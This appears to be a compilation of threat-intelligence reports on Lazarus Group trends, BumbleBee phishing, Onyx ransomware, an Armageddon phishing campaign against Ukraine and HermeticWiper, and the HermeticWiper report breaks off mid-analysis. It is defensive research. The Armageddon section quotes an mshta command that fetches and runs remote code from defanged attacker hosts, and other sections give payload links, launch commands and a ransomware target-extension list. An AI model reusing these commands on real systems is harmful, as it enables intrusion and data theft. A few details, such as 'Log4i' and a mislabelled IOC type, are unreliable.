Lazarus Group Recent Trends

Lazarus Group Recent Trends

Recently Observed Campaigns

The following list contains recent campaigns observed by CYFIRMA Threat Intelligence (CTI) that are attributed to the Lazarus Group and or its affiliates in 2022.

  • • UNC038
  • • UNC050
  • • UNC048
  • • UNC047
  • • guarantee price
  • • MUD NATIONALS
  • • UNC042
  • • UNC039
  • • UNC035
  • • UNC030
  • • UNC029
  • • UNC028

Recently Observed Activities Details

High-level summary of recent campaigns observed by CYFIRMA attributed to the Lazarus Group in 2022.

  • • UNC038 (Jan 30, 2022 – May 10, 2022)
  • • UNC050 (Apr 11, 2022 – Apr 27, 2022)
  • • UNC048 (Apr 11, 2022 – Apr 27, 2022)
  • • UNC047 (Mar 3, 2022 – Apr 18, 2022)
  • • guarantee price (Feb 1, 2022 – Apr 12, 2022)
  • • MUD NATIONALS (Jul 1, 2018 – Mar 20, 2022)
  • • UNC042 (Jan 15, 2022 – Mar 17, 2022)
  • • UNC039 (Jan 31, 2022 – Mar 9, 2022)
  • • UNC035 (Jan 27, 2022 – Feb 22, 2022)
  • • UNC030 (Dec 24, 2021 – Jan 25, 2022)
  • • UNC029 (Apr 28, 2020 – Jan 17, 2022)
  • • UNC028 (Mar 24, 2020 – Jan 13, 2022)

Trends

Out of the 13 campaigns observed by CTI in 2022, the majority of campaigns were targeted at multiple counties across the globe, however, a couple of the campaigns observed by CTI appeared to target specific nations.
The below figure illustrates all the counties which were targeted in these campaigns.

Most Targeted Countries
The following figure illustrates the countries which were subject to the Lazarus Group campaigns.

The United States and Japan have the most favorable targets for Lazarus Group and were targeted in 9 and 8 campaigns respectively. Countries like Singapore, India, and United Kingdom – while not at the top – remain to be of particular interest to the Lazarus Group and were also featured in multiple of their campaigns.
Lazarus Group is known to carry out attacks for financial gains and it can be assessed that the threat actor group similar to financially motivated cyber criminals may opt to attack multiple disparate targets for high returns. However, as the above figure illustrates some of the targeted countries, we observed in 2022 campaigns were part of only one campaign and more interestingly, some of the campaigns were only targeted at specific nation-states. For example, Japan was the only target for the campaigns MUD NATIONALS, UNC029, and UNC028.

Most Targeted Technology
The Lazarus Group leveraged vulnerabilities and exploits in Application Server Software, Database Management Software, Operating systems, Virtual Private Network (VPN) Solutions, and Web Application to infiltrate the network and systems of potential victims.
The below figure illustrates the technologies that target the threat actor group during these campaigns. From the trends, it can be seen that exploiting weaknesses in web application- related software and products is the most favored method by the Lazarus Group. In addition, attempts to exploit remote access solutions such as VPNs have been observed which have been the focal point of cyber criminals these days.

Most Targeted Industry
From the campaign observed by CTI in 2022, Lazarus Group attacked organizations from more than 20+ industry verticals. The majority of these attacks were focused on Industrial Conglomerate organizations, working in the financials, IT sector, and automobile sectors.

Malware/ Tools observed
Below is the list of all the malware used by the Lazarus Group during these campaigns. Only a few of the malware were leveraged by the threat actor in multiple campaigns and most of the malware was seen in only one campaign.

  • • AppleJeus
  • • BlueNoroff
  • • CliptoShuffler
  • • Cobalt Strike
  • • Donoff
  • • Emotet
  • • FallChill
  • • Go Implant
  • • Keydoor
  • • MoonBounce
  • • Mydoom
  • • NukeSped RAT
  • • Pebbledash
  • • Phorpiex
  • • PseudoManuscrypt
  • • Rifdoor
  • • ScrambleCross
  • • StealthMutant
  • • StealthVector
  • • Tiger Downloader
  • • TigerRAT
  • • Tofsee
  • • Torisma
  • • Valyria
  • • Vidar

Top Malware
While numerous malware were used by the Lazarus Group in these campaigns, the NukeSped RAT was the most observed malware in multiple campaigns followed by Cobalt Strike. Other malware including AppleJeus, Emotet, FallChill, and Pebbledash were also leveraged in more than one campaign.

Type of Attacks
The majority of the observed campaign carried out by the Lazarus Group involved heavy use of exploiting vulnerabilities in internet exposed systems including weakness in email/ VPN appliances. The use of malware implants and lateral movement into the organization was a common tactic. The method of phishing and credential theft was only observed once out of 13 campaigns tracked by CTI.

Threat Actor Profile
Alias: APT 38, APT-38, APT38, Andariel, AppleJeus, Appleworm, Bluenoroff,B ureau 121, Covellite, Dark Seoul, Group 77, Group77, Guardians of Peace, Hastati Group, Hidden Cobra, Labyrinth Chollima, Lazarus, NICKEL ACADEMY, NewRomanic Cyber Army Team, Operation DarkSeoul, Operation GhostSecret, Operation Troy, Silent Chollima, Stardust Chollima, Unit 121, Whois Hacking Team, ZINC

Researchers describe the Lazarus Group to have 3 subgroups as listed below. While the Lazarus Group tend to concentrate on espionage-style attacks, other subgroups such as Bluenoroff are specialists in cyberattacks that largely have a financial element.

  • Subgroup: Andariel, Silent Chollima
  • Subgroup: BeagleBoyz
  • Subgroup: Bluenoroff, APT 38, Stardust Chollima

Origin: North Korea
Active: 2007 – Present

Description: Since at least 2009, Lazarus Group has been observed as a highly sophisticated cybercriminal group that is known to be affiliated with the North Korean government (as per the Council of Foreign Relations – CFR). They are known to the U.S. government as Hidden Cobra. The person involved in the Lazarus Group operations is known as a member of an organization affiliated with Lab 110, a component of DPRK military intelligence.

They are capable of rapidly developing, mutating, and evolving existing exploits/malware in their malware development unit. Recently, they are observed targeting cryptocurrency exchange companies.

Lazarus Group’s targets have primarily been South Korea (organizations of political relevance), Bangladesh Bank, Sony Pictures Entertainment, and some other Unites States- based organizations. Lazarus Group is believed to be divided into at least two subdivisions: the first, named Andariel, which focuses primarily on attacking the South Korean government and organizations, and the second, Bluenoroff, whose main focus is monetization and global espionage campaigns. Some of the long-standing campaigns attributed to them are Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, Ten Days of Rain, the Sony Pictures Entertainment attack, the SWIFT-related bank heists, and WannaCry.

Targeted Countries: Australia, Brazil, Brunei, Canada, Chile, China, Darussalam, Democratic People’s Republic of Korea, France, Germany, Guatemala, Hongkong, India, Indonesia, Islamic Republic of Iran, Japan, Myanmar, Philippines, Poland, Republic of Korea, Russia, Thailand, United Kingdom, United States, Vietnam, Bangladesh.

Targeted Industries: Aerospace & Defense, Capital Markets, Consumer Finance, Cryptocurrency, Defense, Diversified Financial Services, Energy, Entertainment, Government, Hotels, Investment Trusts (REITs), Media, NGO, Real Estate, Restaurants & Leisure, Technology, Telecommunications., Thrifts and Mortgage, Banks

Tools: The group has been known to utilize following tools in their attacks chain: NestEgg, Tdrop2, SHARPKNOT, RawDisk, Destover, CleanToad, ELECTRICFISH, Quickcafe, Http Dr0pper, NachoCheese, DeltaCharlie, PowerBrace, BTC Changer, HotelAlfa, Castov, Volgmer, DoublePulsar, Plink, BlindToad, PowerRatankba, PowerShell RAT, RomeoNovember, ValeforBeta, PEBBLEDASH, Koredos, RomeoEcho, RomeoWhiskey, ARTFULPIE, RomeoGolf, Yort, NukeSped, RomeoFoxtrot, Vyveva, Troy, Bookcode, Bitsran, CheeseTray, RedShawl, SierraCharlie, TFlower, Hawup, SheepRAT, FallChill RAT, Stunnel, RomeoCharlie, RomeoDelta, Rifdoor, Jokra, Romeos, SierraAlfa, SLICKSHOES, Aryan, ClientTraficForwarder, HOPLIGHT, WolfRAT, Tdrop, Andaratm, BanSwift, Recon, 3Rat Client, Duuzer, BUFFETLINE, EternalBlue, netsh, Mydoom, Concealment Troy, Dacls RAT, KillDisk, BADCALL, MATA, OpBlockBuster, CookieTime, Dtrack, Hermes, ATMDtrack, Mimikatz, COPPERHEDGE, DyePack, RomeoMike, Hotwax, RomeoBravo, Gh0st RAT, PowerTask, RomeoAlfa, Wormhole, Brambul, Fimlis, AuditCred, BISTROMATH, Joanap, HTTP Troy, KEYMARBLE, Rising Sun, Bankshot, PhanDoor, 3proxy, ProcDump, RatankbaPOS, VHD, HOTCROISSANT, PSLogger, RomeoHotel, PowerSpritz, HtDnDownLoader, WbBot, VSingle, BLINDINGCAN, TAINTEDSCRIBE, BootWreck, Contopee, Dozer

Malware: The group has been known to utilize following malware in their attacks chain:
AuditCred, Volgmer, WannaCry, BADCALL, APPLEJEUS, HARDRAIN, MATA, ThreatNeedle, Destover, Bankshot, RATANKBA, Proxysvc, Vyveva, Torisma Spyware, FALLCHILL, HOPLIGHT, DarkComet, KEYMARBLE, TYPEFRAME

Motive: CTI believes that Lazarus Group and associate groups’ activities are aligned to the political interests of North Korea and attacks are primarily motivated by financial or/and political gains.

Recent Activity:
The threat actor has been observed exploiting the Log4i remote code execution vulnerability to inject backdoors that fetch information-stealing payloads on VMware Horizon servers. Lazarus Group uses NukeSped to install an additional console-based information-stealer malware, which collects information stored on web browsers. In some attacks, Lazarus Group was observed deploying Jin Miner instead of NukeSped by leveraging Log4Shell.

MITRE ATT&CK TTPs

Sr No. Tactic Technique
1 TA0042: Resource Development T1583.001: Acquire Infrastructure: Domains
T1583.006: Acquire Infrastructure: Web Services
T1587.001: Develop Capabilities: Malware
T1588.004: Obtain Capabilities: Digital Certificates
2 TA0001: Initial Access T1189: Drive-by Compromise
T1566.001: Phishing: Spearphishing Attachment
3 TA0002: Execution T1059.003: Command and Scripting Interpreter: Windows Command Shell
T1203: Exploitation for Client Execution
T1204.002: User Execution: Malicious File
T1047: Windows Management Instrumentation
4 TA0003: Persistence T1098: Account Manipulation
T1547.001: Boot or Logon AutoStart Execution: Registry Run Keys / Startup Folder
T1547.009: Boot or Logon AutoStart Execution: Shortcut Modification
T1543.003: Create or Modify System Process: Windows Service
T1542.003: Pre-OS Boot: Bootkit
5 TA0004: Privilege Escalation T1134.002: Access Token Manipulation: Create Process with Token
T1547.001: Boot or Logon AutoStart Execution: Registry Run Keys / Startup Folder
T1547.009: Boot or Logon AutoStart Execution: Shortcut Modification
T1543.003: Create or Modify System Process: Windows Service
T1055.001: Process Injection: Dynamic-link Library Injection
6 TA0005: Defence Evasion T1134.002: Access Token Manipulation: Create Process with Token
T1564.001: Hide Artifacts: Hidden Files and Directories
T1562.001: Impair Defenses: Disable or Modify System Firewall
T1562.004: Impair Defenses: Disable or Modify Tools
T1070.004: Indicator Removal on Host: File Deletion
T1070.006: Indicator Removal on Host: Timestomp
T1036.005: Masquerading: Match Legitimate Name or Location
T1027: Obfuscated Files or Information
T1542.003: Pre-OS Boot: Bootkit
T1055.001: Process Injection: Dynamic-link Library Injection
T1218.001: Signed Binary Proxy Execution: Compiled HTML File
7 TA0006; Credential Access T1110.003: Brute Force: Password Spraying
T1056.001: Input Capture: Keylogging
8 TA0007: Discovery T1010: Application Window Discovery
T1083: File and Directory Discovery
T1057: Process Discovery
T1012: Query Registry
T1082: System Information Discovery
T1016: System Network Configuration Discovery
T1124: System Time Discovery
T1033: System Owner/User Discovery
9 TA0008: Lateral Movement T1021.001: Remote Services: Remote Desktop Protocol
T1021.002: Remote Services: SMB/Windows Admin Shares
10 TA0009: Collection T1560: Archive Collected Data
T1560.002: Archive Collected Data: Archive via Library
T1560.003: Archive Collected Data: Archive via Custom Method
T1005: Data from Local System
T1074.001: Data Staged: Local Data Staging
T1056.001: Input Capture: Keylogging
11 TA0011: Command and Control T1071.001: Application Layer Protocol: Web Protocols
T1132.001: Data Encoding: Standard Encoding
T1001.003: Data Obfuscation: Protocol Impersonation
T1573.001: Encrypted Channel: Symmetric Cryptography
T1008: Fallback Channels
T1105: Ingress Tool Transfer
T1571: Non-Standard Port
T1090.002: Proxy: External Proxy
12 TA0010: Exfiltration T1048.003: Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
T1041: Exfiltration Over C2 Channel
13 TA0040: Impact T1485: Data Destruction
T1491.001: Defacement: Internal Defacement
T1561.001: Disk Wipe: Disk Content Wipe
T1561.002: Disk Wipe: Disk Structure Wipe
T1496: Resource Hijacking
T1489: Service Stop
T1529: System Shutdown/Reboot

Insights

The Lazarus Group has been known to be spearheaded by the North Korean government in alignment with their political and economic goals to target organizations and exfiltrate sensitive information to assist their local companies. It is widely established that the group’s primary motive is financial gains to overcome the effect of long-standing sanctions. The group is known to leverage new strategies and custom toolkits with their campaigns, as a result, the cyber operations may appear irrational. However, it is suspected the North Korean threat actors tend to operate on a wider scope as opposed to other nation-state threat actors and are likely to continue their operations similarly.

CTI suspects North-Korean threat actor groups will likely continue collaboration with Chinese and/ or Russian threat actor groups to meet their objectives. Doing so, they may offer their services/expertise as part of the Hacker-as-a-Service (HaaS) model to steal sensitive information in return for financial gains. Not only such cooperation will have a common target but will also provide some form of relief from the sanctions that have been enforced by the government of other nation states on these countries.

Recommended Actions

  • Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes
  • Deploy Zero Trust Policy that leverages tools like security information management, advanced security analytics platforms, security user behaviour analytics, and other analytics systems to help the organization’s security personnel observe in real-time what is happening within their networks so they can orient defences more intelligently.
  • Facilitate security teams with attack surface management capability for continuous discovery, inventory, classification, prioritization, and security monitoring to gain comprehensive visibility of the enterprise environment.
  • Emphasize the responsible use of social media platforms, train the workforce on the amount and nature of information being shared.
  • Plan periodic Red Team exercises to measure the effectiveness of the people, processes, and security technologies used to defend the environment. Red Team exercise helps organizations to improve security controls detection, enhance defensive capabilities, and measure the overall effectiveness of existing security operations.
  • Perform regular Cyber Benchmarking exercises to benchmark the security performance against industry peers, measure the impact of risk mitigation efforts, and report security progress and results to the Board of Directors more clearly and effectively.
  • Enable emerging security solutions like deception technology powered with machine learning helps in real-time breach detection and prevention.
  • Classify and segregate the organization’s business-critical system a.k.a as Crown jewels and have a special security monitoring on those assets.
  • Ensure applications requiring authentication over the internet are protected with multi- factor authentication.
  • Ensure combination security control such as CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), Device fingerprinting, IP backlisting, Rate-limiting, and Account lockout are implemented and adequately strengthened to thwart automated brute-force attacks.
  • Improve the detection signatures of Intrusion detection and prevention systems with custom rules to monitor and alert network intrusions.
  • Exert caution when opening email attachments or clicking on embedded links received via email communications.
  • Update all applications/software regularly with the latest versions and security patches alike.
  • Deploy an email filter solution that screens based on headers and malicious content (e.g., malicious macros, infected attachments, etc.), categorizes email, inspects Uniform Resource Locators (URLs) against reputation feeds, and has customizable rule-based filters.
  • Strip and/or block emails containing active content (e.g., ActiveX, Java, Visual Basic for Applications [VBA])or macros by default. Administrators should allowlist such content only for legitimate reasons.
  • Ensure detection signatures and blocklists are up to date.
  • Implement warning banners to alert users about emails with links and attachments that originate from outside the organization.

 

Phishing Analysis

Phishing Analysis

A new phishing campaign by TA578 is uncovered that utilizes thread hijacked emails to deploy the BumbleBee malware which is followed by Cobalt Strike. Earlier, the TA578 threat actor used to deploy Urnsif, IcedID, KPOT Stealer, Buer Loader, and BazaLoader malware. The BumbleBee malware supports commands as listed below.

  • Shellcode injection
  • DLL injection in the memory of other processes
  • Download executable
  • Uninstall loader
  • Enable persistence via a scheduled task for a Visual Basic Script that loads Bumblebee

These features were not present in the earlier malware.

The email sample is part of an email thread that is hijacked by the attacker to bait the user to open the hyperlink.

hxxps[:]//storage[.]googleapis[.]com/urh21265vg2o9x[.]appspot[.]com/g/b/file/d/fZ xgV38APHDew[.]html

EML file MD5: 9f0c4ed7308226d143e214ad43a29711

Upon opening the link, an ISO file is downloaded from Google Drive which is a Bumblebee payload.

Payload Hash: a0fca5d81252df8623f431b461b0da30

The domain 2brightlights[.]com has been used in other campaigns. This domain was used in one of the Bazarloader campaigns in 2020.

The ISO file is embedded with .lnk file and .DLL file

DLL file Hash: bb2f698d6b1aebba2c1d16ef665d3463

When the iso executed the .lnk file, it contains the command: %windir%\system32\rundll32.exe tamirlan.dllEdHVntqdWt, to run the .DLL file

This malware is capable of deploying the ransomware to encrypt the system and exfiltrate the data to the C2 server. Further, it can drop Cobalt Strike, Shellcode, Silver, and other red team tools.

Conclusion:

Phishing emails are the primary vector for attackers to get initial access to organizations leading to the deployment of ransomware and other post-exploitation tools to exfiltrate critical data for financial gains. The infamous Conti gang has recently changed their delivery payload malware from BazzarLoader to BumbleBee, signaling continuous innovation and the move to more sophisticated and evasive malware.

MITRE ATT&CK Tactics and Techniques

Sr No. Tactic Technique
1 TA0001: Initial Access T1566 :Phishing
2 TA0002: Execution T1059.007: Command and Scripting Interpreter: JavaScript
3 TA0003: Persistence T1547.001: Registry Run Keys / Startup Folder
4 TA0005: Defense Evasion T1027: Obfuscated Files or Information
    T1497.003: Virtualization/Sandbox Evasion:
Time Based Evasion
5 TA0007: Discovery T1012: Query Registry
T1057: Process Discovery
6 TA0009: Collection T1056.004: Credential API Hooking
    T1005: Data from Local System

 

Onyx Ransomware Report

Onyx Ransomware Report

Suspected Malware: onyx Ransomware
Function: Ransomware
Risk Score: 8
Confidence Level: High
Threat actor Associations: Unknown

Executive Summary:

The activity of new ransomware named “Onyx” was first observed in the second half of April 2022. This ransomware group has seven victims listed on its data leak page[.onion site of the group till now. This ransomware encrypts files and then modifies their filenames by appending the .ampkcz extension. After this ransomware completes encrypting a device, it drops a ransom note, “readme.txt” into every encrypted directory. So far this malware has mostly targeted organizations in the United States.

ONYX Ransomware Analysis:

Sample Details:
File Type: Windows PE
Architecture: 32 Bit
MD5: CF6FF9E0403B8D89E42AE54701026C1F
SHA1: A4F5CB11B9340F80A89022131FB525B888AA8BC6
SHA256: A7F09CFDE433F3D47FC96502BF2B623AE5E7626DA85D0A0130DCD19D1679AF9B
Subsystem: GUI
Compilation Time: Wed Apr 20 10:53:53 2022

This malware was written by the .net programing language. This malware binary file’s size is 26624 (bytes). It has a method, which enumerates the list of processes running on the host by Getprocess API. Upon executing this malware on the system, it first does check if the malware instance is already running on the system by process name and process ID. In case the malware instance is already running, the malware will not be executed new instance.

After this, the threat actor checks if this malware file path is in “ C:\Users\username\AppData\Roaming”, and if this malicious sample has enabled the sleep(checksleep) option. In case this malicious binary file exists in that folder, the currently running thread sleeps for more than 1000 milliseconds.

Once the above verification is done, this ransomware author gets the file name of the malicious binary and the folder path of the malicious binary where it is located, then get the path of the “C:\Users\username\AppData\Roaming”. Then the threat actor checks if this malicious binary exists in the “C:\Users\username\AppData\Roaming” location, a file name such as “svchost.exe” which is hardcoded in this malware code. If this file does not exist in that path by the same name, it will create file [Duplicate MD5] in that location and do minor modifications[required] in the process information data structure field. In case the file name already exists, then this malicious code deletes the file, sleeps the currently running threat for 200 milliseconds, and then does the self copies [Duplicate MD5] of that file in that location.

This malware hardcoded a specific list of the file location in their code as shown in the below figure. This malware before executing the encrypt routine lists several directory names and paths where it will look for files it will do encryption.

Also, this malware has hardcoded a specific list of the file extension in its code as shown in the below figure. These are files extension this malware will encrypt if the file sizes are less than 2 MB.

“.txt”,,”.jar”,,”.dat”,,”.contact”,,”.settings”,,”.doc”,,”.docx”,,”.xls”,,”.xlsx”,,”.ppt”,,”.pptx”,,”.odt”,,”.jpg”,,”.mka”,,”.mhtml”,,”.oqy”,,”.png”,,”.csv”,,”.py”,,”.sql”,,”.mdb”,,”.php”,,”.asp”,,”.aspx”,,”.html”,,”.htm”,,”.xml”,,
“.psd”,,”.pdf”,,”.xla”,,”.cub”,,”.dae”,,”.indd”,,”.cs”,,”.mp3″,,”.mp4″,,”.dwg”,,”.zip”,,”.rar”,,”.mov”,,”.rtf”,,”.bmp”,,”.mkv”,,”.avi”,,”.apk”,,”.url”,,”.dib”,,”.dic”,,”.dif”,,”.divx”,,”.iso”,,”.7zip”,,”.ace”,,”.arj”,,”.bz2″,,”.cab”,,”.gzip”,
,”.lzh”,,”.tar”,,”.jpeg”,,”.xz”,,”.mpeg”,,”.torrent”,,”.mpg”,,”.core”,,”.pdb”,,”.ico”,,”.pas”,,”.db”,,”.wmv”,,”.swf”,,”.cer”,,”.bak”,,”.backup”,,”.accdb”,,”.bay”,,”.p7c”,,”.exif”,,”.vss”,,”.raw”,,”.m4a”,,”.wma”,,”.flv”,,”.sie”,,”.sum”,,”.ibank”,,”.wallet”,,”.css”,,”.js”,,
“.rb”,,”.crt”,,”.xlsm”,,”.xlsb”,,”.7z”,,”.cpp”,,”.java”,,”.jpe”,,”.ini”,,”.blob”,,”.wps”,,”.docm”,,”.wav”,,”.3gp”,,”.webm”,,”.m4v”,,”.amv”,,”.m4p”,,”.svg”,,”.ods”,,”.bk”,,”.vdi”,,”.vmdk”,,”.onepkg”,,”.accde”,,”.jsp”,,”.json”,,”.gif”,,”.log”,,”.gz”,,”.config”,,
“.vb”,,”.m1v”,,”.sln”,,”.pst”,,”.obj”,,”.xlam”,,”.djvu”,,”.inc”,,”.cvs”,,”.dbf”,,”.tbi”,,”.wpd”,,”.dot”,,”.dotx”,,”.xltx”,,”.pptm”,,”.potx”,,”.potm”,,”.pot”,,”.xlw”,,”.xps”,,”.xsd”,,”.xsf”,,”.xsl”,,”.kmz”,,”.accdr”,,”.stm”,,”.accdt”,,”.ppam”,,”.pps”,,”.ppsm”,,”.1cd”,,”
.3ds”,,”.3fr”,,”.3g2″,,”.accda”,,”.accdc”,,”.accdw”,,”.adp”,,”.ai”,,”.ai3″,,”.ai4″,,”.ai5″,,”.ai6″,,”.ai7″,,”.ai8″,,”.arw”,,”.ascx”,,”.asm”,,”.asmx”,,”.avs”,,”.bin”,,”.cfm”,,”.dbx”,,”.dcm”,,”.dcr”,,”.pict”,,”.rgbe”,,”.dwt”,,”.f4v”,,”.exr”,,”.kwm”,,”.max”,,”.mda”,,”.mde”,
,”.mdf”,,”.mdw”,,”.mht”,,”.mpv”,,”.msg”,,”.myi”,,”.nef”,,”.odc”,,”.geo”,,”.swift”,,”.odm”,,”.odp”,,”.oft”,,”.orf”,,”.pfx”,,”.p12″,,”.pl”,,”.pls”,,”.safe”,,”.tab”,,”.vbs”,,”.xlk”,,”.xlm”,,”.xlt”,,”.xltm”,,”.svgz”,,”.slk”,,”.tar.gz”,,”.dmg”,,”.ps”,,”.psb”,,”.tif”,,”.rss”,,”.key”,,”.vob”,,
“.epsp”,,”.dc3″,,”.iff”,,”.onepkg”,,”.onetoc2″,,”.opt”,,”.p7b”,,”.pam”,,”.r3d”,,”.dsn”,,”.dmp”,,”.qbw”,,”.imr”,,”.nd”,,”.chw”,,”.spi”,,”.ep”,,”.tlg”,,”.qbb”,,”.msi”,,”.eml”,,”.thmx”,,”.obi”,,”.chm”,,”.pub”,,”.md5″,,”.spf”,,”.spk”,,”.idx”,,”.scc”,,”.jdk”,,”.cnt”,,”.tum”,,
“.dsm”,,”.reg”,,”.cfg”,,”.ldf”,,”.bat”,,”.dxf”,,”.SLDDRW”,,”.SLDPRT”,,”.SLDASM”,,”.mil”,,”.dlf”,,”.c4″,,”.pdx”.

This threat actor checks the file sizes are smaller than two megabytes. If file sizes are more than two megabytes, Onyx ransomware is destroying files (by randomly creating junk data) instead of encrypting them.

If file sizes are less than 2MBs, Onyx ransomware encrypts the file using AES+RSA algorithms. Then the added base64string too has encrypted contents.

Once this ransomware encrypts files and then it will modify their filenames by appending the .ampkcz extension. After this, the ransomware completes encrypting files on victims’ devices, it drops a ransom note as “readme.txt” into every encrypted directory. This malware writer hardcoded the ransomware notes and the appending the file extension in their code.

Onyx ransomware operators offer to decrypt “two random files completely free of charge” to prove they “really can get the data back.”

This ransomware operator checks the drivers that have been mounted in the infected victim’s machine and then tries to spread the malicious files to mounted folders.

Apart from this, this malicious code has a logic – which is – if the malware author enabled the Adminprivilage [checkAdminPrivilage] is true. The malware code will run the below commands to delete volume shadow copies and backup catalogs then disable recovery.

As per the below code snippet, the threat actor achieved the persistence techniques by modifying the registry entry and startup folder[creating shortcut].

To set the wallpaper on the victim’s machine desktop, the malware author should generate a .jpg file in the temp folder. The file name for the .jpg file is the randomized characters.

Conclusion:

Onyx Ransomware could be distributed by using tactics like social engineering, phishing, spam email, malicious attachment, etc. Before executing the encryption routine the threat actor stole the victim’s data and used a double-extortion approach for attacks. They threaten to publish the stolen data on their leak site if victims are not ready to pay the ransom. Onyx ransomware is based on the Chaos ransomware builder 4 [This ransomware uses the same destructive encryption algorithm as Chaos ransomware ]. Based on the ransom note format, we suspect that this ransomware operator is leveraging the ransom note logic used by the Conti ransomware gang.

List of IOCs:

Sr No. Indicator Type Remarks
1 CF6FF9E0403B8D89E42AE54701026C1F MD5 Onyx Ransomware EXE File
2 C:\Users\username\AppData\Roaming\svchost.exe File location Victim Unique ID
3 hxxp://ibpwmfrlbwkfd4asg57t4x2vkrczuq3uhrfxf6y35xoalwjlztil54ad[.]onion MD5 Support Chat Link
4 amp.exe Internalfile name Name Victim Unique ID

Mitre Attack Tactics and Techniques (Based on our analysis):

Sr No. Tactic Technique
1 Initial Access (TA0001) T1566 Phishing
2 Execution (TA0002) T1106:Native API
T1129: Shared Modules
3 Persistence (TA0003) T1547.001:Boot or Logon Autostarts Execution: Registry Run Keys / Startup Folder
4 Defense Evasion (TA0005) T1027:Obfuscated Files or Information
5 Credential Access(TA0006) T1552.001:Unsecured Credentials: Credentials In Files
6 Discovery (TA0007) T1082 System Information Discovery
T1083 File and Directory Discovery
7 Impact (TA0040) T1486:Data Encrypted for Impact

 

Phishing Campaign related to Russia-Ukraine Conflict

Phishing Campaign related to the On-going Russia-Ukraine Conflict

A new phishing campaign related to threat actor “Armageddon” was noticed earlier this month. The threat actor “Armageddon” was observed to be sending phishing emails to various Ukraine government organizations.

The email carried the subject line “Інформація щодо військових злочинців РФ (Information on Russian war criminals)”.

EML File MD5: C1C62DA5A36FED274F7777D5B8D111AE

The malicious email contains an .htm attachment with the name “Військові злочинці РФ.htm (War criminals of the Russian Federation.htm)” encoded in Base64.

HTML File MD5: E6D3136A111925940502886E30D4FD4B Base64 Decoded: 602E39A47A531B3F2B394A7176D6C87D

Upon opening the .htm file, it connects to “http://jokotras[.]ru/su/faicon[.]ico” and downloads the RAR file with the name “Viyskovi_zlochinci_RU.rar”

RAR File MD5: 35323AB59C094F3742A60998BE6D0A27

Upon extracting the RAR, the file contains a shortcut link with the name in Ukrainian “Військові-злочинці що знищують Україну (домашні адреси, фото, номера телефонів, сторінки у соціальних сетях)” and translated to English “War criminals destroying Ukraine (home addresses, photos, phone numbers, social media pages)”

When opening the shortcut link, it tries to connect and execute .hta file with the command “C:\Windows\System32\mshta[.]exe” http://prefer[.]jokotras[.]ru/hear/nephew/su /f” by connecting to URL “http://prefer[.]jokotras[.]ru/hear/nephew/su”. Adversaries abuse “mshta.exe” to execute  .hta or Javascript or VB Script files as “mshta.exe” is a Microsoft trusted binary.

The .hta file contains a VB Script and would further download and execute PowerShell script “get.php” from “http://tiloraso[.]ru/get[.]php”

The power shell script generates unique identification for the system by using the system drive volume serial number, a random value, and computer name to connect with the URL “http://tiloraso[.]ru/index[.]php” to download .exe file into %TEMP directory and start it as a new process.

The mentioned URL “http://prefer[.]jokotras[.]ru/hear/nephew/su” used to execute .hta file is currently down as threat actors change their C2 and URLs frequently to evade detection and tracking.

Conclusion: The report is in line with recent Russian-originated attacks targeting Ukraine in view of the Russia-Ukraine conflict. Phishing or spear-phishing emails are primary vectors to exploit vulnerable users and organizations. Additional verification and security countermeasures are required to deal with suspicious emails, specifically those with .htm files.

 

Hermetic Wiper Malware Report

Hermetic Wiper Malware Report

Date: 04-April-22
Author: Dilpreet Singh Bajwa (Cyfirma-Malware Research Team)

Suspected Malware: Hermetic Wiper
Function: Wiper
Risk Score: 8
Confidence Level: High
Threat actor Associations: Unknown – Pro Russian
First Seen: Feb 2022
DeCyfir presence: Yes

Executive Summary:

The HermeticWiper is related to one of the early malware attacks against Ukraine during Russia invasion in Feb 2022. HermeticWiper is a new malware use to wipe data from the victim machine and targeted mainly the infrastructure and defense sectors of Ukraine. It’s a tool of destruction as it wipes data from the victim’s disk and then it targets the Master Boot Record (MBR) resulting in complete boot failure and made system inoperable. The research community given name HermeticWiper based on a valid certificate from “HERMETICA Digital Ltd” used by the malware. To evade detection and gaining trust, the malware used a valid certificate as well as the embedded files use a legitimate data recovery program from “EaseUS” packed as drivers by malware authors to enumerate and overwrite MBR to corrupt the file system.

HermeticWiper Analysis:

Sample Details:
File Type: Windows PE EXE
Architecture: 32 Bit
MD5: 84ba0197920fd3e2b7dfa719fee09d2f
SHA256: 0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da
Subsystem: GUI
Language:
Compilation Time: 28 Dec 2021

Digital Signatures:

Figure 1

The malware used a valid certificate from “Hermetica Digital Ltd” (see Figure1) which helps it to evade detection and gain trust to be run as legitimate application.

Embedded Files:

The malware contains four embedded files named as DRV_X64, DRV_X86, DRV_XP_64, DRV_XP_X86 with each having magic bytes “SZZD” which indicates that the files are compressed with the built-in MS-DOS compress.exe (see Figure2 and Figure3).

The hashes corresponding to compressed files are given below:

  1. DRV_X64: a952e288a1ead66490b3275a807f52e5
  2. DRV_X86: 231b3385ac17e41c5bb1b1fcb59599c4
  3. DRV_XP_X64: 095a1678021b034903c85dd5acb447ad
  4. DRV_XP_X86: eb845b7a16ed82bd248e395d9852f467

Figure 2

Figure 3

Drivers Information:

Our research team extracted these embedded files and decompressed them. The hashes corresponding to extracted decompressed file are given below:

  1. Uncompressed DRV_X64: 6106653b08f4f72eeaa7f099e7c408a4
  2. Uncompressed DRV_X86: 093cee3b45f0954dce6cb891f6a920f7
  3. Uncompressed DRV_XP_X64: bdf30adb4e19aff249e7da26b7f33ead
  4. Uncompressed DRV_XP_X86: d57f1811d8258d8d277cd9f53657eef9

The names chosen for drivers are as per different versions of windows like XP or others and different architecture 32 or 64-bit. These four files are legitimate drivers from the “EaseUS” software signed by “CHENGDU YIWO Tech Development Co., Ltd”. and used to perform low-level disk operations (see Figure4). A quick internet search tells the linkage between “EaseUS” disk recovery program and “CHENGDU YIWO Tech Development Co., Ltd” (see Figure5).

Figure 4

Figure 5

As per the timestamps of the extracted drivers, the compilation time is quite old for all drivers i.e., Aug 2008 (see Figure6) and each one having almost same debug path:

  1. h:\epm2.0\01_projectarea\00_source\epm2\mod.windiskaccessdriver\windiskaccessdriver\objfre_wlh_amd64\amd64\epmntdrv.pdb
